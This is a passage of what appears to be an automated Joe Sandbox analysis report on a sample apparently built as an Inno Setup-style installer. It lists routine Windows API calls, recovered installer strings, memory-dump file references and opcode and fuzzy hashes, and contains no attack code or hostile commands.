                                                                                                            • Opcode Fuzzy Hash: 9a7a18137ec586f3ae39864321f244483684a0ffa01bccee3b65953e1ffa7791
                                                                                                            • Instruction Fuzzy Hash: A8114A72B4030127E310BA7E9C86B5B76899B88748F05483FB506EB383DEB9DC094399
                                                                                                            APIs
                                                                                                            • OffsetRect.USER32(?,?,00000000), ref: 00493DE8
                                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 00493E03
                                                                                                            • OffsetRect.USER32(?,?,00000000), ref: 00493E1D
                                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 00493E38
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: OffsetRect
                                                                                                            • String ID:
                                                                                                            • API String ID: 177026234-0
                                                                                                            • Opcode ID: cfbccf1d698e82d79065cf95299db1547cf674505700e5d727bb5bb08f6f6c11
                                                                                                            • Instruction ID: 626cbd3239d4ed1d666785e4d5506dc5f63added092c4cfac4a9a75855a5826e
                                                                                                            • Opcode Fuzzy Hash: cfbccf1d698e82d79065cf95299db1547cf674505700e5d727bb5bb08f6f6c11
                                                                                                            • Instruction Fuzzy Hash: EF217AB6704201AFD700DE69CD85EABBBEEEBC4304F14CA2AF554C7249D634ED0487A6
                                                                                                            APIs
                                                                                                            • GetCursorPos.USER32 ref: 00417270
                                                                                                            • SetCursor.USER32(00000000), ref: 004172B3
                                                                                                            • GetLastActivePopup.USER32(?), ref: 004172DD
                                                                                                            • GetForegroundWindow.USER32(?), ref: 004172E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 1959210111-0
                                                                                                            • Opcode ID: 8d64426bf1faa67f7e63d5b49e58984f19945b6ec6e4dfcc44bb455274275b92
                                                                                                            • Instruction ID: d42235d32f12bbd537443306c781531a61dc82822ae97907460fdfc4b9dfd860
                                                                                                            • Opcode Fuzzy Hash: 8d64426bf1faa67f7e63d5b49e58984f19945b6ec6e4dfcc44bb455274275b92
                                                                                                            • Instruction Fuzzy Hash: E02183313086018BCB20EB69D885AD773B1AB44758F4545ABF895CB352D73DDC82CB89
                                                                                                            APIs
                                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00493A51
                                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00493A65
                                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00493A79
                                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00493A97
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                            • Instruction ID: 4fded1b76b16cf5233eb9f491647a43cf70802087f48ea21bc09c20ce05eabc8
                                                                                                            • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                            • Instruction Fuzzy Hash: D011FE72604204ABCB40DEA9D8C4D9B7BECEF4D364B1541AAF918DB246D674ED408BA8
                                                                                                            APIs
                                                                                                            • GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
                                                                                                            • UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
                                                                                                            • RegisterClassA.USER32(00498598), ref: 0041F4E4
                                                                                                            • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 4025006896-0
                                                                                                            • Opcode ID: 136fc58a234aa641408c6a2d16d1f9be3dcad2dac9a418606983712f211af1eb
                                                                                                            • Instruction ID: 3ade520867520f28231aed23d56b060c1ae6e85fc3aaaf2b039856689379b016
                                                                                                            • Opcode Fuzzy Hash: 136fc58a234aa641408c6a2d16d1f9be3dcad2dac9a418606983712f211af1eb
                                                                                                            • Instruction Fuzzy Hash: 600152B12401047BCB10EF6DED81E9B37999769314B11413BBA05E72E1DA3A9C194BAD
                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
                                                                                                            • LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B574,0000000A,REGDLL_EXE), ref: 0040D241
                                                                                                            • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B574), ref: 0040D25B
                                                                                                            • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                            • String ID:
                                                                                                            • API String ID: 3473537107-0
                                                                                                            • Opcode ID: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                                                            • Instruction ID: 8b55825d53d46818f15098a3aa340eb6897fe62b828c159971ec5f2842f97e2f
                                                                                                            • Opcode Fuzzy Hash: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                                                            • Instruction Fuzzy Hash: ADF062736046046F8704EE9DA881D5B77ECDE88364310017FF908EB246DA38DD018B78
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(00000000,00000000), ref: 0046EE29
                                                                                                            Strings
                                                                                                            • Failed to set NTFS compression state (%d)., xrefs: 0046EE3A
                                                                                                            • Unsetting NTFS compression on directory: %s, xrefs: 0046EE0F
                                                                                                            • Setting NTFS compression on directory: %s, xrefs: 0046EDF7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast
                                                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                                            • API String ID: 1452528299-1392080489
                                                                                                            • Opcode ID: 69acb3433b7424efc8733916a2e3fd5d2b01e13f314b1d1949af057b0dba6a86
                                                                                                            • Instruction ID: 1e7f5b79b7b83b0710ae0b74761658cb8013dc9fe861025df3af78f0f88b0ad9
                                                                                                            • Opcode Fuzzy Hash: 69acb3433b7424efc8733916a2e3fd5d2b01e13f314b1d1949af057b0dba6a86
                                                                                                            • Instruction Fuzzy Hash: B1016734E0824856CF04D7EEA0412DDBBE49F09314F4485EFA855DB383EB7A0A0987AB
                                                                                                            APIs
                                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045AECE,?,?,?,?,?,00000000,0045AEF5), ref: 004552F4
                                                                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045AECE,?,?,?,?,?,00000000), ref: 004552FD
                                                                                                            • RemoveFontResourceA.GDI32(00000000), ref: 0045530A
                                                                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0045531E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 4283692357-0
                                                                                                            • Opcode ID: 697a476951aa0a0ca9570e552bc061f69c865505889b6d894dbdf5d1e046680c
                                                                                                            • Instruction ID: 219cbfe3a978a329188234ed78272d854ba8405160bd4c7ea72be768510c46b8
                                                                                                            • Opcode Fuzzy Hash: 697a476951aa0a0ca9570e552bc061f69c865505889b6d894dbdf5d1e046680c
                                                                                                            • Instruction Fuzzy Hash: A3F05EB574070036EA10B6B69C87F2F268C9F98746F10483BBA04EF2C3D97CD804562D
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(0000003C,00000000), ref: 0046F5D5
                                                                                                            Strings
                                                                                                            • Setting NTFS compression on file: %s, xrefs: 0046F5A3
                                                                                                            • Unsetting NTFS compression on file: %s, xrefs: 0046F5BB
                                                                                                            • Failed to set NTFS compression state (%d)., xrefs: 0046F5E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast
                                                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                                            • API String ID: 1452528299-3038984924
                                                                                                            • Opcode ID: 2ae6e740da7d12cab45fc3fda2904aab771333dfed4c0176c99f618606694c86
                                                                                                            • Instruction ID: af1263a2bc2d08d5f84e5bf4467a93fc8ad6fd7f39d305876acfad47ab44e8ff
                                                                                                            • Opcode Fuzzy Hash: 2ae6e740da7d12cab45fc3fda2904aab771333dfed4c0176c99f618606694c86
                                                                                                            • Instruction Fuzzy Hash: 43016C30D0824865CF14DB9DA0412DDBBE49F09314F5485FFA895DB343EA790A0D8BAB
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CountSleepTick
                                                                                                            • String ID:
                                                                                                            • API String ID: 2227064392-0
                                                                                                            • Opcode ID: 0d6abcf2624c376c92be4fe051ac8c721ea0e8e4158ee005a25feb70aac8199d
                                                                                                            • Instruction ID: 04319ed9576db886230fb9bc867ee798ddcaac356600663dffa6fb38092a16ff
                                                                                                            • Opcode Fuzzy Hash: 0d6abcf2624c376c92be4fe051ac8c721ea0e8e4158ee005a25feb70aac8199d
                                                                                                            • Instruction Fuzzy Hash: 70E09B7230954149DA2935BF28C67BF5588CBC5764F145D3FF08DD6282C91C4C4796BE
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A,00000000), ref: 00476CB5
                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A), ref: 00476CBB
                                                                                                            • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7), ref: 00476CDD
                                                                                                            • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7), ref: 00476CEE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 215268677-0
                                                                                                            • Opcode ID: 643da1b25484e25618dfc2f33770e0810dba7622c7134d6ef75615b708b11c8e
                                                                                                            • Instruction ID: 52cacee470f693cc175e787ed480d05e054b7fb82800b5b9fad0ca038f03fef1
                                                                                                            • Opcode Fuzzy Hash: 643da1b25484e25618dfc2f33770e0810dba7622c7134d6ef75615b708b11c8e
                                                                                                            • Instruction Fuzzy Hash: 04F01CA16447016ED600EAB5CD82A9B76DCEB44354F04883ABE98C72C1D678D808AA66
                                                                                                            APIs
                                                                                                            • GetLastActivePopup.USER32(?), ref: 0042425C
                                                                                                            • IsWindowVisible.USER32(?), ref: 0042426D
                                                                                                            • IsWindowEnabled.USER32(?), ref: 00424277
                                                                                                            • SetForegroundWindow.USER32(?), ref: 00424281
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 2280970139-0
                                                                                                            • Opcode ID: 815aaf66aeb93fdb7eaca90ddf7e3ec79125ce151ba931028ab749093d5bac7c
                                                                                                            • Instruction ID: cc3e18b4355afb8de1117362fa5ee1cc3bb5bcb08e60588071b409dab7082488
                                                                                                            • Opcode Fuzzy Hash: 815aaf66aeb93fdb7eaca90ddf7e3ec79125ce151ba931028ab749093d5bac7c
                                                                                                            • Instruction Fuzzy Hash: DBE08691B02571929E71FA671881A9F018CCD45BE434602A7FD04F7243DB1CCC0041BC
                                                                                                            APIs
                                                                                                            • GlobalHandle.KERNEL32 ref: 00406287
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040628E
                                                                                                            • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00406299
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocHandleLockUnlock
                                                                                                            • String ID:
                                                                                                            • API String ID: 2167344118-0
                                                                                                            • Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                                            • Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
                                                                                                            • Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                                            • Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
                                                                                                            APIs
                                                                                                            • GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 0046A1F3
                                                                                                            • EnableMenuItem.USER32(00000000,00000000,00000000), ref: 0046A1F9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$EnableItemSystem
                                                                                                            • String ID: CurPageChanged
                                                                                                            • API String ID: 3692539535-2490978513
                                                                                                            • Opcode ID: ce3d69d9ba1a62642177f6d71e0f7aaa340e11e2d471205b7fc5bc675cd66b6b
                                                                                                            • Instruction ID: 7720c050ea6da0ef8e1be1b899a85f81ec2d70891b76be637dda81d079de5e74
                                                                                                            • Opcode Fuzzy Hash: ce3d69d9ba1a62642177f6d71e0f7aaa340e11e2d471205b7fc5bc675cd66b6b
                                                                                                            • Instruction Fuzzy Hash: 04B12834604604DFCB11DB59DA85EE973F5EF49308F2540F6E804AB362EB38AE51DB4A
                                                                                                            APIs
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047A685,?,00000000,00000000,00000001,00000000,004790B1,?,00000000), ref: 00479075
                                                                                                            Strings
                                                                                                            • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00478EE9
                                                                                                            • Failed to parse "reg" constant, xrefs: 0047907C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close
                                                                                                            • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                                            • API String ID: 3535843008-1938159461
                                                                                                            • Opcode ID: 6cfa3a26321e55d12a01db98da27023ce14a7644c07822183f99b0fb8cfb2842
                                                                                                            • Instruction ID: fcc941d39f61a36dc7ba98d018d7fa63e98928215e6e5a71d63c1788f81e571e
                                                                                                            • Opcode Fuzzy Hash: 6cfa3a26321e55d12a01db98da27023ce14a7644c07822183f99b0fb8cfb2842
                                                                                                            • Instruction Fuzzy Hash: F3818174E00148AFCF10EF95D485ADEBBF9AF49314F50816AE814B7391CB38AE05CB99
                                                                                                            APIs
                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049A420,00000000,004021FC), ref: 004020CB
                                                                                                              • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                              • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                              • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                              • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                                            • String ID: H=w
                                                                                                            • API String ID: 296031713-625060171
                                                                                                            • Opcode ID: e2799b5b2f2489a9888bdfe4983345d4327c7833a1c5a51ce4349eec843293c7
                                                                                                            • Instruction ID: 43da59c6024c014fdcfbd4f667e22ace29d18c19eb36fc191a59cc880b6cb292
                                                                                                            • Opcode Fuzzy Hash: e2799b5b2f2489a9888bdfe4983345d4327c7833a1c5a51ce4349eec843293c7
